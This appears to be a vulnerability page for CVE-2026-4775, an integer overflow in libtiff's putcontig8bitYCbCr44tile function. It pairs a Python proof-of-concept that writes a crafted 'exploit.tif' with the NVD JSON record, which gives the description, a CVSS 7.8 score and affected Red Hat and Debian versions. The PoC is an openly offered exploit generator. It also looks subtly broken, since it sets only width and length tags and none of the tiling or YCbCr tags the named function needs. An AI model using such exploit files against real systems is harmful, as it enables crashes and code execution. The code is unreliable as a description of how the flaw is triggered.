CVE-2026-4775

import struct def generate_malicious_tiff(filename): """ PoC for CVE-2026-4775 Generates a crafted TIFF file designed to trigger integer overflow in putcontig8bitYCbCr44tile function within libtiff. """ with open(filename, 'wb') as f: # TIFF Header (Little Endian) f.write(b'II') # Byte Order f.write(struct.pack('<H', 42)) # Magic Number f.write(struct.pack('<I', 8)) # Offset to first IFD # IFD Entries f.write(struct.pack('<H', 2)) # Number of entries # Tag 256: ImageWidth (Set to large value to trigger overflow) f.write(struct.pack('<H', 256)) # Tag f.write(struct.pack('<H', 4)) # Type (LONG) f.write(struct.pack('<I', 1)) # Count f.write(struct.pack('<I', 0x7FFFFFFF)) # Value/Offset (Max signed int) # Tag 257: ImageLength f.write(struct.pack('<H', 257)) # Tag f.write(struct.pack('<H', 4)) # Type (LONG) f.write(struct.pack('<I', 1)) # Count f.write(struct.pack('<I', 1)) # Value # Next IFD offset f.write(struct.pack('<I', 0)) # No more IFDs if __name__ == "__main__": print("Generating exploit.tif...") generate_malicious_tiff("exploit.tif") print("Done.")

{"cve": {"id": "CVE-2026-4775", "sourceIdentifier": "[email protected]", "published": "2026-03-24T15:16:39.693", "lastModified": "2026-05-20T17:16:27.403", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in the libtiff library. A remote attacker could exploit a signed integer overflow vulnerability in the putcontig8bitYCbCr44tile function by providing a specially crafted TIFF file. This flaw can lead to an out-of-bounds heap write due to incorrect memory pointer calculations, potentially causing a denial of service (application crash) or arbitrary code execution."}, {"lang": "es", "value": "Se encontró un fallo en la biblioteca libtiff. Un atacante remoto podría explotar una vulnerabilidad de desbordamiento de entero con signo en la función putcontig8bitYCbCr44tile al proporcionar un archivo TIFF especialmente diseñado. Este fallo puede llevar a una escritura fuera de límites en el heap debido a cálculos incorrectos del puntero de memoria, potencialmente causando una denegación de servicio (caída de la aplicación) o ejecución de código arbitrario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libtiff:libtiff:-:*:*:*:*:*:*:*", "matchCriteriaId": "2FFD25C1-A304-486F-A36B-7167EEF33388"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:hardened_images:-:*:*:*:*:*:*:*", "matchCriteriaId": "87DEB507-5B64-47D7-9A50-3B87FD1E571F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:12265", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:12271", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:14929", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:16055", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19150", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19363", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19585", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19586", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19604", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19608", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19609", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19657", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19659", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19702", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-4775", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450768", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2026/04/msg00016.html", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}